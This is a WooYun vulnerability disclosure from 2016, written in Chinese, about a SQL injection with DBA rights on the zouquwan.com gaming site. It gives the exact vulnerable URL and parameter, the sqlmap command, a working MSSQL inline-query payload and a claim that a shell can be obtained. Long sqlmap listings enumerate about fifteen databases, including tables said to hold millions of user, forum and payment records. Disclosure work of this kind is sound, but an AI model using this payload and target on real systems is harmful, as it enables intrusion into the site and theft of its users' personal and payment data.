当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0171452

漏洞标题:走去玩游戏网主站DBA权限SQL注入(涉及千万用户信息)

相关厂商:走去玩游戏网

漏洞作者: 路人甲

提交时间:2016-01-21 12:00

修复时间:2016-03-05 09:52

公开时间:2016-03-05 09:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-01-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-03-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

走去玩游戏网主站DBA权限SQL注入(涉及千万用户信息)

详细说明:

【注入点】:python sqlmap.py -u "http://www.zouquwan.com/common/Server_Default.aspx?ColId=2"
sqlmap截图:
【当前数据库】

1.png


【跨库查询】

2.png


下面开始统计,仅统计了涉及大量用户信息的表,实际会更多!
【第一个库】
相加可得百万用户信息量
dbo.KyUsers | 541078 |
dbo.Ky_User_Personal | 540668 |

3.png


【第二个库】
用户信息以及支付信息 过百万
dbo.Ky_User_Personal | 1077610 |
dbo.KyPlayedGame | 658654 |
dbo.KyUserCard | 306459 |
dbo.KyPayLog | 98208 |
dbo.KyUsers | 32446

4.png


【第三个库】
用户信息相加过百万
dbo.KyUsers | 494228 |
dbo.Ky_User_Personal | 493826

5.png


【第四个库】
用户信息以及支付信息 过百万
dbo.Ky_User_Personal | 1067853

6.png


【第五个库】
相加可得四百多万用户数据
dbo.Ky_User_Personal | 2349603 |
dbo.KyUsers | 2349146

7.png


【第六与七个库】
跨库查询论坛
| dbo.dnt_users | 614321 |
| dbo.dnt_userfields | 614318

8.png


9.png


总计达千万用户量(这是一道数学题)


【DBA权限(可getshell)】

10.png


漏洞证明:

数据库信息:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ColId (GET)
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: ColId=(SELECT CHAR(113)+CHAR(107)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (5902=5902) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(106)+CHAR(113))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: owanwan_oss
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.KyUserProcessLog                 | 1680    |
| dbo.KyDayStateForExcel               | 1569    |
| dbo.KyController                     | 244     |
| dbo.KyLabelContent                   | 165     |
| dbo.KyTag                            | 115     |
| dbo.KyColumn                         | 107     |
| dbo.KyLongCards                      | 100     |
| dbo.KyLog                            | 90      |
| dbo.KyDictionary                     | 82      |
| dbo.KyPowerColumn                    | 64      |
| dbo.KyStyle                          | 48      |
| dbo.KyLinkManager                    | 45      |
| dbo.KyModelField                     | 42      |
| dbo.KyUsers                          | 36      |
| dbo.KyUserGroupModelField            | 34      |
| dbo.Ky_User_Personal                 | 30      |
| dbo.KyChannel                        | 29      |
| dbo.KyPlayedGame                     | 29      |
| dbo.KyChannelTemplate                | 24      |
| dbo.KyPayLog                         | 21      |
| dbo.Ky_U_Game                        | 14      |
| dbo.KySuperLabel                     | 14      |
| dbo.KyActionPassword                 | 13      |
| dbo.KyPowerGroup                     | 11      |
| dbo.KyLbCategory                     | 9       |
| dbo.KyListStyleContent               | 8       |
| dbo.Ky_U_Shop                        | 6       |
| dbo.KyArticle                        | 6       |
| dbo.KyModel                          | 6       |
| dbo.KyUserTask                       | 6       |
| dbo.KyStyleCategory                  | 5       |
| dbo.KyKeyUrl                         | 4       |
| dbo.KyOrder                          | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KyAdmin                          | 2       |
| dbo.KyReport                         | 2       |
| dbo.KyTestPlayLink                   | 2       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.KyWebMessage                     | 2       |
| dbo.Ky_U_Server                      | 1       |
| dbo.KyAd                             | 1       |
| dbo.KyAdCategory                     | 1       |
| dbo.KyLink                           | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySpecial                        | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KyUserSpace                      | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: stat
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.Stat_ViewOnClick                 | 2344112 |
| dbo.Stat_Ip                          | 369089  |
| dbo.Stat_ViewEngine                  | 3417    |
| dbo.Stat_ViewHour                    | 1610    |
| dbo.Stat_FriendLink                  | 47      |
| dbo.Stat_ViewDay                     | 41      |
| dbo.Stat_News                        | 16      |
| dbo.Stat_Users                       | 14      |
| dbo.Stat_Message                     | 11      |
| dbo.Stat_Navigate                    | 9       |
| dbo.Stat_ViewWeekDay                 | 9       |
| dbo.Stat_Notify                      | 6       |
| dbo.Stat_AD                          | 5       |
| dbo.Stat_WebSites                    | 4       |
| dbo.Stat_System                      | 3       |
| dbo.Stat_ViewMonth                   | 3       |
| dbo.Stat_Company                     | 1       |
| dbo.Stat_stmp                        | 1       |
+--------------------------------------+---------+
Database: NewOSS
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.KyUsers                          | 541078  |
| dbo.Ky_User_Personal                 | 540668  |
| dbo.KyPlayedGame                     | 489296  |
| dbo.KySxdCards                       | 7195    |
| dbo.KyLog                            | 3568    |
| dbo.KyLongCards                      | 3233    |
| dbo.KyUserProcessLog                 | 1680    |
| dbo.KyDayStateForExcel               | 1569    |
| dbo.KyArticle                        | 629     |
| dbo.Ky_User_Business                 | 411     |
| dbo.KyController                     | 238     |
| dbo.Ky_U_Server                      | 214     |
| dbo.KyUser_Attribute                 | 181     |
| dbo.KyLabelContent                   | 158     |
| dbo.KyTag                            | 115     |
| dbo.KyColumn                         | 107     |
| dbo.KyDictionary                     | 82      |
| dbo.KyPowerColumn                    | 64      |
| dbo.KyStyle                          | 47      |
| dbo.KyLinkManager                    | 45      |
| dbo.KyModelField                     | 41      |
| dbo.TemplateUser                     | 38      |
| dbo.KyUserGroupModelField            | 34      |
| dbo.KyChannel                        | 29      |
| dbo.Ky_U_Game                        | 24      |
| dbo.KyChannelTemplate                | 24      |
| dbo.KyAdmin                          | 18      |
| dbo.KyActionPassword                 | 13      |
| dbo.KyPowerGroup                     | 11      |
| dbo.KySuperLabel                     | 11      |
| dbo.KyLbCategory                     | 8       |
| dbo.KyListStyleContent               | 8       |
| dbo.KyTransHistory                   | 7       |
| dbo.KyUserTask                       | 7       |
| dbo.Ky_U_Shop                        | 6       |
| dbo.KyModel                          | 6       |
| dbo.Ky_U_Task                        | 4       |
| dbo.KyKeyUrl                         | 4       |
| dbo.KyOrder                          | 4       |
| dbo.KyStyleCategory                  | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KyAnomaly                        | 3       |
| dbo.KyPayLog                         | 2       |
| dbo.KyReport                         | 2       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.KyWebMessage                     | 2       |
| dbo.KyAd                             | 1       |
| dbo.KyAdCategory                     | 1       |
| dbo.KyLink                           | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySpecial                        | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KyTestPlayLink                   | 1       |
| dbo.KyUserSpace                      | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: bbsgamexilu
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.dnt_medals                       | 99      |
| dbo.dnt_smilies                      | 88      |
| dbo.dnt_help                         | 29      |
| dbo.dnt_topicidentify                | 17      |
| dbo.dnt_onlinelist                   | 16      |
| dbo.dnt_usergroups                   | 15      |
| dbo.dnt_attachtypes                  | 6       |
| dbo.dnt_scheduledevents              | 6       |
| dbo.dnt_navs                         | 5       |
| dbo.dnt_admingroups                  | 3       |
| dbo.dnt_bbcodes                      | 2       |
| dbo.dnt_forumfields                  | 2       |
| dbo.dnt_forums                       | 2       |
| dbo.dnt_forumlinks                   | 1       |
| dbo.dnt_notices                      | 1       |
| dbo.dnt_online                       | 1       |
| dbo.dnt_onlinetime                   | 1       |
| dbo.dnt_statistics                   | 1       |
| dbo.dnt_statvars                     | 1       |
| dbo.dnt_tablelist                    | 1       |
| dbo.dnt_templates                    | 1       |
| dbo.dnt_userfields                   | 1       |
| dbo.dnt_users                        | 1       |
+--------------------------------------+---------+
Database: OSS
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.Ky_User_Personal                 | 1077610 |
| dbo.KyPlayedGame                     | 658654  |
| dbo.KyUserCard                       | 306459  |
| dbo.KyPayLog                         | 98208   |
| dbo.KyUsers                          | 32446   |
| dbo.Ky_UsersUpdate                   | 31271   |
| dbo.KyLog                            | 13149   |
| dbo.Ky_BindUserName                  | 12422   |
| dbo.KySxdCards                       | 12349   |
| dbo.Ky_BindUserName_20130606         | 11813   |
| dbo.KyArticle                        | 8856    |
| dbo.Ky_BindUserName2                 | 8078    |
| dbo.KyLongCards                      | 4699    |
| dbo.KyUserProcessLog                 | 3553    |
| dbo.KyDayStateForExcel               | 3121    |
| dbo.temp_users                       | 2581    |
| dbo.Ky_U_Server                      | 1179    |
| dbo.KyUser_Attribute                 | 667     |
| dbo.KyTestPlayLink                   | 634     |
| dbo.KyLink                           | 421     |
| dbo.Ky_User_Business                 | 411     |
| dbo.KyTag                            | 396     |
| dbo.KyLabelContent                   | 273     |
| dbo.KyController                     | 246     |
| dbo.KyColumn                         | 227     |
| dbo.KyTransHistory                   | 206     |
| dbo.KyKeyUrl                         | 116     |
| dbo.TemplateUser                     | 115     |
| dbo.KyDictionary                     | 83      |
| dbo.KyPowerColumn                    | 63      |
| dbo.KyChannel                        | 62      |
| dbo.Ky_U_Game                        | 61      |
| dbo.KyLinkManager                    | 45      |
| dbo.KyChannelTemplate                | 39      |
| dbo.KyStyle                          | 34      |
| dbo.KyUserGroupModelField            | 33      |
| dbo.KyModelField                     | 16      |
| dbo.KyPowerGroup                     | 11      |
| dbo.KyAdmin                          | 9       |
| dbo.KyActionPassword                 | 8       |
| dbo.KyLbCategory                     | 8       |
| dbo.KyListStyleContent               | 8       |
| dbo.KyAnomaly                        | 5       |
| dbo.KyModel                          | 4       |
| dbo.KyStyleCategory                  | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KySuperLabel                     | 3       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.KyAd                             | 1       |
| dbo.KyAdCategory                     | 1       |
| dbo.KyNotice                         | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySpecial                        | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KyTagCategory                    | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: oss20120620_test
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.KyUsers                          | 494228  |
| dbo.Ky_User_Personal                 | 493826  |
| dbo.KyPlayedGame                     | 437623  |
| dbo.KyUserCard                       | 119866  |
| dbo.KyPayLog                         | 35192   |
| dbo.KySxdCards                       | 5618    |
| dbo.KyLog                            | 2806    |
| dbo.KyLongCards                      | 2519    |
| dbo.KyDayStateForExcel               | 850     |
| dbo.KyUserProcessLog                 | 720     |
| dbo.Ky_User_Business                 | 411     |
| dbo.KyArticle                        | 213     |
| dbo.KyController                     | 175     |
| dbo.Ky_U_Server                      | 166     |
| dbo.KyUser_Attribute                 | 136     |
| dbo.KyTag                            | 95      |
| dbo.KyDictionary                     | 83      |
| dbo.KyLabelContent                   | 65      |
| dbo.KyPowerColumn                    | 61      |
| dbo.KyLinkManager                    | 45      |
| dbo.Ky_U_Game                        | 38      |
| dbo.KyUserGroupModelField            | 33      |
| dbo.KyStyle                          | 23      |
| dbo.KyChannelTemplate                | 16      |
| dbo.KyModelField                     | 16      |
| dbo.TemplateUser                     | 12      |
| dbo.KyColumn                         | 11      |
| dbo.KyAdmin                          | 10      |
| dbo.KyChannel                        | 8       |
| dbo.KyLbCategory                     | 8       |
| dbo.KyListStyleContent               | 8       |
| dbo.KyActionPassword                 | 7       |
| dbo.KyKeyUrl                         | 4       |
| dbo.KyModel                          | 4       |
| dbo.KyPowerGroup                     | 4       |
| dbo.KyStyleCategory                  | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KyAnomaly                        | 3       |
| dbo.KyTransHistory                   | 3       |
| dbo.KySuperLabel                     | 2       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.KyKeyWord                        | 1       |
| dbo.KyLink                           | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KyTestPlayLink                   | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: zouquwan
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.KyUserCard                       | 9511    |
| dbo.KyPlayedGame                     | 9021    |
| dbo.Ky_User_Personal                 | 5317    |
| dbo.KyPayLog                         | 3848    |
| dbo.KyUsers                          | 2978    |
| dbo.KyLog                            | 2641    |
| dbo.Ky_U_Server                      | 847     |
| dbo.KyArticle                        | 826     |
| dbo.KyController                     | 238     |
| dbo.KyLabelContent                   | 219     |
| dbo.KyColumn                         | 151     |
| dbo.KyLongCards                      | 100     |
| dbo.JCZ3Tmp                          | 94      |
| dbo.KyDictionary                     | 82      |
| dbo.KyPowerColumn                    | 64      |
| dbo.KyStyle                          | 49      |
| dbo.KyLinkManager                    | 45      |
| dbo.KyModelField                     | 42      |
| dbo.TemplateUser                     | 40      |
| dbo.Ky_U_Game                        | 34      |
| dbo.KyUserGroupModelField            | 34      |
| dbo.KySuperLabel                     | 14      |
| dbo.KyActionPassword                 | 13      |
| dbo.KyPowerGroup                     | 11      |
| dbo.KyLbCategory                     | 9       |
| dbo.KyListStyleContent               | 8       |
| dbo.KyTransHistory                   | 7       |
| dbo.Ky_U_Shop                        | 6       |
| dbo.KyModel                          | 6       |
| dbo.KyUserTask                       | 6       |
| dbo.KyChannel                        | 5       |
| dbo.KyKeyUrl                         | 5       |
| dbo.KyStyleCategory                  | 5       |
| dbo.Ky_U_Task                        | 4       |
| dbo.KyOrder                          | 4       |
| dbo.KyReport                         | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KyTestPlayLink                   | 3       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.KyWebMessage                     | 2       |
| dbo.KyAd                             | 1       |
| dbo.KyAdCategory                     | 1       |
| dbo.KyAdmin                          | 1       |
| dbo.KyAnomaly                        | 1       |
| dbo.KyLink                           | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySpecial                        | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KySxdCards                       | 1       |
| dbo.KyUserSpace                      | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: test20140106
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.Ky_User_Personal                 | 1067853 |
| dbo.KyPlayedGame                     | 657788  |
| dbo.KyUserCard                       | 306459  |
| dbo.KyPayLog                         | 97926   |
| dbo.Ky_UsersUpdate                   | 31271   |
| dbo.KyLog                            | 13096   |
| dbo.Ky_BindUserName                  | 12419   |
| dbo.KySxdCards                       | 12330   |
| dbo.Ky_BindUserName_20130606         | 11813   |
| dbo.KyArticle                        | 8854    |
| dbo.Ky_BindUserName2                 | 8078    |
| dbo.KyUsers                          | 5926    |
| dbo.KyLongCards                      | 4699    |
| dbo.KyUserProcessLog                 | 3553    |
| dbo.KyDayStateForExcel               | 3121    |
| dbo.temp_users                       | 2581    |
| dbo.Ky_U_Server                      | 1158    |
| dbo.KyUser_Attribute                 | 667     |
| dbo.KyTestPlayLink                   | 634     |
| dbo.TestUserName                     | 441     |
| dbo.KyLink                           | 421     |
| dbo.Ky_User_Business                 | 411     |
| dbo.KyTag                            | 396     |
| dbo.KyLabelContent                   | 273     |
| dbo.KyController                     | 246     |
| dbo.KyColumn                         | 227     |
| dbo.KyTransHistory                   | 206     |
| dbo.KyKeyUrl                         | 116     |
| dbo.TemplateUser                     | 115     |
| dbo.KyDictionary                     | 83      |
| dbo.KyPowerColumn                    | 63      |
| dbo.KyChannel                        | 62      |
| dbo.Ky_U_Game                        | 61      |
| dbo.KyLinkManager                    | 45      |
| dbo.KyChannelTemplate                | 39      |
| dbo.KyStyle                          | 34      |
| dbo.KyUserGroupModelField            | 33      |
| dbo.KyModelField                     | 16      |
| dbo.KyPowerGroup                     | 11      |
| dbo.KyAdmin                          | 9       |
| dbo.KyActionPassword                 | 8       |
| dbo.KyLbCategory                     | 8       |
| dbo.KyListStyleContent               | 8       |
| dbo.KyAnomaly                        | 5       |
| dbo.KyModel                          | 4       |
| dbo.KyStyleCategory                  | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KySuperLabel                     | 3       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.KyAd                             | 1       |
| dbo.KyAdCategory                     | 1       |
| dbo.KyNotice                         | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySpecial                        | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KyTagCategory                    | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: OSSbak
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.Ky_User_Personal                 | 2349603 |
| dbo.KyUsers                          | 2349146 |
| dbo.KyPlayedGame                     | 683280  |
| dbo.KyUserCard                       | 312828  |
| dbo.KyPayLog                         | 114418  |
| dbo.Ky_UsersUpdate                   | 31271   |
| dbo.KyLog                            | 15882   |
| dbo.KySxdCards                       | 12764   |
| dbo.Ky_BindUserName                  | 12534   |
| dbo.Ky_BindUserName_20130606         | 11813   |
| dbo.KyArticle                        | 9408    |
| dbo.Ky_BindUserName2                 | 8078    |
| dbo.KyLongCards                      | 4701    |
| dbo.kyUsersCardId                    | 3880    |
| dbo.KyUserProcessLog                 | 3553    |
| dbo.KyDayStateForExcel               | 3121    |
| dbo.temp_users                       | 2581    |
| dbo.Ky_U_Server                      | 1888    |
| dbo.KyTestPlayLink                   | 713     |
| dbo.KyUser_Attribute                 | 667     |
| dbo.KyUserstest                      | 458     |
| dbo.KyLink                           | 425     |
| dbo.Ky_User_Business                 | 411     |
| dbo.KyTag                            | 403     |
| dbo.KyLabelContent                   | 343     |
| dbo.KyColumn                         | 298     |
| dbo.KyController                     | 246     |
| dbo.KyTransHistory                   | 206     |
| dbo.KyKeyUrl                         | 116     |
| dbo.TemplateUser                     | 115     |
| dbo.KyDictionary                     | 83      |
| dbo.KyChannel                        | 80      |
| dbo.Ky_U_Game                        | 78      |
| dbo.KyPowerColumn                    | 63      |
| dbo.KyLinkManager                    | 45      |
| dbo.KyChannelTemplate                | 39      |
| dbo.KyStyle                          | 34      |
| dbo.KyUserGroupModelField            | 33      |
| dbo.KyPayLogbak                      | 27      |
| dbo.KyModelField                     | 16      |
| dbo.KyPowerGroup                     | 11      |
| dbo.KyAdmin                          | 10      |
| dbo.KyActionPassword                 | 8       |
| dbo.KyLbCategory                     | 8       |
| dbo.KyListStyleContent               | 8       |
| dbo.KyAnomaly                        | 5       |
| dbo.KyModel                          | 4       |
| dbo.KyStyleCategory                  | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KySuperLabel                     | 3       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.KyAd                             | 1       |
| dbo.KyAdCategory                     | 1       |
| dbo.KyNotice                         | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySpecial                        | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KyTagCategory                    | 1       |
| dbo.KyUserAlbum                      | 1       |
| dbo.KyUserSpace                      | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: Moyou
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.Ky_User_Business                 | 411     |
| dbo.KyTag                            | 400     |
| dbo.Ky_User_Personal                 | 385     |
| dbo.KyUsers                          | 385     |
| dbo.KyController                     | 247     |
| dbo.KyLink                           | 170     |
| dbo.KyArticle                        | 153     |
| dbo.KyLog                            | 147     |
| dbo.KyKeyUrl                         | 116     |
| dbo.TemplateUser                     | 110     |
| dbo.KyLabelContent                   | 100     |
| dbo.KyDictionary                     | 85      |
| dbo.KyPowerColumn                    | 63      |
| dbo.KyLinkManager                    | 45      |
| dbo.KyChannelTemplate                | 39      |
| dbo.KyStyle                          | 35      |
| dbo.KyUserGroupModelField            | 33      |
| dbo.KyColumn                         | 24      |
| dbo.KyModelField                     | 22      |
| dbo.KyAdmin                          | 19      |
| dbo.KyPowerGroup                     | 11      |
| dbo.KyChannel                        | 9       |
| dbo.KyActionPassword                 | 8       |
| dbo.KyLbCategory                     | 8       |
| dbo.KyListStyleContent               | 8       |
| dbo.KyModel                          | 5       |
| dbo.KyAnomaly                        | 4       |
| dbo.KyStyleCategory                  | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KySuperLabel                     | 3       |
| dbo.Ky_U_Flash                       | 2       |
| dbo.Ky_U_Game                        | 2       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.Ky_U_Server                      | 1       |
| dbo.KyAd                             | 1       |
| dbo.KyAdCategory                     | 1       |
| dbo.KyNotice                         | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySpecial                        | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KyTagCategory                    | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.MSdbms_datatype_mapping          | 325     |
| dbo.sysdatatypemappings              | 325     |
| dbo.MSdbms_map                       | 248     |
| dbo.MSdatatype_mappings              | 174     |
| dbo.MSdbms_datatype                  | 141     |
| dbo.backupfile                       | 129     |
| dbo.backupfilegroup                  | 63      |
| dbo.backupset                        | 63      |
| dbo.backupmediafamily                | 56      |
| dbo.backupmediaset                   | 55      |
| dbo.syssessions                      | 51      |
| dbo.restorefile                      | 36      |
| dbo.syscategories                    | 21      |
| dbo.restorefilegroup                 | 18      |
| dbo.restorehistory                   | 18      |
| dbo.syssubsystems                    | 11      |
| dbo.MSdbms                           | 7       |
| dbo.sysmail_configuration            | 7       |
| dbo.sysdtscategories                 | 3       |
| dbo.sysdtspackagefolders90           | 2       |
| dbo.sysdbmaintplans                  | 1       |
| dbo.sysmail_servertype               | 1       |
| dbo.sysoriginatingservers_view       | 1       |
| dbo.systargetservers_view            | 1       |
+--------------------------------------+---------+
Database: owanwan
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.KyUserCard                       | 5218    |
| dbo.KyLog                            | 4650    |
| dbo.KyPlayedGame                     | 4045    |
| dbo.Ky_User_Personal                 | 3074    |
| dbo.KyUserProcessLog                 | 1777    |
| dbo.KyPayLog                         | 1607    |
| dbo.KyDayStateForExcel               | 1569    |
| dbo.Ky_U_Server                      | 939     |
| dbo.KyUsers                          | 776     |
| dbo.KyArticle                        | 757     |
| dbo.KyController                     | 240     |
| dbo.KyUser_Attribute                 | 221     |
| dbo.KyLabelContent                   | 184     |
| dbo.KyColumn                         | 128     |
| dbo.KyTag                            | 116     |
| dbo.KyLongCards                      | 100     |
| dbo.KySxdCards                       | 100     |
| dbo.KyDictionary                     | 82      |
| dbo.KyPowerColumn                    | 64      |
| dbo.KyStyle                          | 49      |
| dbo.KyLinkManager                    | 45      |
| dbo.Ky_U_Game                        | 44      |
| dbo.KyModelField                     | 42      |
| dbo.TemplateUser                     | 38      |
| dbo.KyChannel                        | 34      |
| dbo.KyUserGroupModelField            | 34      |
| dbo.KyChannelTemplate                | 24      |
| dbo.KySuperLabel                     | 14      |
| dbo.KyActionPassword                 | 13      |
| dbo.KyPowerGroup                     | 11      |
| dbo.KyTransHistory                   | 10      |
| dbo.KyLbCategory                     | 9       |
| dbo.KyListStyleContent               | 8       |
| dbo.Ky_U_Shop                        | 6       |
| dbo.KyModel                          | 6       |
| dbo.KyUserTask                       | 6       |
| dbo.KyKeyUrl                         | 5       |
| dbo.KyStyleCategory                  | 5       |
| dbo.Ky_U_Task                        | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KyReport                         | 3       |
| dbo.KyTestPlayLink                   | 3       |
| dbo.KyAdmin                          | 2       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.KyWebMessage                     | 2       |
| dbo.KyAd                             | 1       |
| dbo.KyAdCategory                     | 1       |
| dbo.KyAnomaly                        | 1       |
| dbo.KyLink                           | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySpecial                        | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KyUserSpace                      | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| sys.all_parameters                   | 6697    |
| sys.all_columns                      | 4254    |
| dbo.spt_values                       | 2346    |
| sys.all_objects                      | 1808    |
| sys.all_sql_modules                  | 1591    |
| sys.all_views                        | 284     |
| sys.allocation_units                 | 112     |
| INFORMATION_SCHEMA.COLUMNS           | 50      |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44      |
| INFORMATION_SCHEMA.SCHEMATA          | 14      |
| INFORMATION_SCHEMA.TABLES            | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 5       |
| dbo.MSreplication_options            | 3       |
| INFORMATION_SCHEMA.ROUTINES          | 2       |
| dbo.spt_monitor                      | 1       |
+--------------------------------------+---------+
Database: zouquwantest
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.KyUserCard                       | 9511    |
| dbo.Ky_User_Personal                 | 2970    |
| dbo.KyPlayedGame                     | 2517    |
| dbo.KyUsers                          | 1305    |
| dbo.KyPayLog                         | 837     |
| dbo.KyLog                            | 715     |
| dbo.KyController                     | 238     |
| dbo.KyLabelContent                   | 219     |
| dbo.KyArticle                        | 151     |
| dbo.KyColumn                         | 151     |
| dbo.Ky_U_Server                      | 124     |
| dbo.KyLongCards                      | 100     |
| dbo.KyDictionary                     | 82      |
| dbo.KyPowerColumn                    | 64      |
| dbo.KyStyle                          | 49      |
| dbo.KyLinkManager                    | 45      |
| dbo.KyModelField                     | 42      |
| dbo.TemplateUser                     | 40      |
| dbo.KyUserGroupModelField            | 34      |
| dbo.Ky_U_Game                        | 17      |
| dbo.KySuperLabel                     | 14      |
| dbo.KyActionPassword                 | 13      |
| dbo.KyPowerGroup                     | 11      |
| dbo.KyLbCategory                     | 9       |
| dbo.KyListStyleContent               | 8       |
| dbo.KyTransHistory                   | 7       |
| dbo.Ky_U_Shop                        | 6       |
| dbo.KyModel                          | 6       |
| dbo.KyUserTask                       | 6       |
| dbo.KyChannel                        | 5       |
| dbo.KyKeyUrl                         | 5       |
| dbo.KyStyleCategory                  | 5       |
| dbo.Ky_U_Task                        | 4       |
| dbo.KyOrder                          | 4       |
| dbo.KyUserFriendGroup                | 4       |
| dbo.KyReport                         | 3       |
| dbo.KyTestPlayLink                   | 3       |
| dbo.KyUserGroup                      | 2       |
| dbo.KyUserGroupModel                 | 2       |
| dbo.KyWebMessage                     | 2       |
| dbo.KyAd                             | 1       |
| dbo.KyAdCategory                     | 1       |
| dbo.KyAdmin                          | 1       |
| dbo.KyLink                           | 1       |
| dbo.KySinglePage                     | 1       |
| dbo.KySpecial                        | 1       |
| dbo.KySuperior                       | 1       |
| dbo.KySxdCards                       | 1       |
| dbo.KyUserSpace                      | 1       |
| dbo.KyVoteCategory                   | 1       |
+--------------------------------------+---------+
Database: BBS
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.dnt_users                        | 614321  |
| dbo.dnt_userfields                   | 614318  |
| dbo.dnt_pms                          | 158452  |
| dbo.dnt_myposts                      | 43548   |
| dbo.dnt_posts1                       | 31793   |
| dbo.dnt_moderatormanagelog           | 30221   |
| dbo.dnt_mytopics                     | 24664   |
| dbo.dnt_topics                       | 24657   |
| dbo.dnt_onlinetime                   | 9377    |
| dbo.dnt_topictagcaches               | 8932    |
| dbo.dnt_myattachments                | 3659    |
| dbo.dnt_attachments                  | 3536    |
| dbo.dnt_adminvisitlog                | 3430    |
| dbo.dnt_topictags                    | 2084    |
| dbo.dnt_trendstat                    | 1591    |
| dbo.dnt_scheduledevents              | 1532    |
| dbo.dnt_statvars                     | 1274    |
| dbo.dnt_tags                         | 1242    |
| dbo.dnt_forumfields                  | 295     |
| dbo.dnt_forums                       | 295     |
| dbo.dnt_stats                        | 104     |
| dbo.dnt_medals                       | 99      |
| dbo.dnt_smilies                      | 88      |
| dbo.dnt_topictypes                   | 37      |
| dbo.dnt_forumlinks                   | 31      |
| dbo.dnt_help                         | 29      |
| dbo.dnt_onlinelist                   | 20      |
| dbo.dnt_moderators                   | 19      |
| dbo.dnt_usergroups                   | 19      |
| dbo.dnt_topicidentify                | 18      |
| dbo.dnt_polloptions                  | 16      |
| dbo.dnt_favorites                    | 14      |
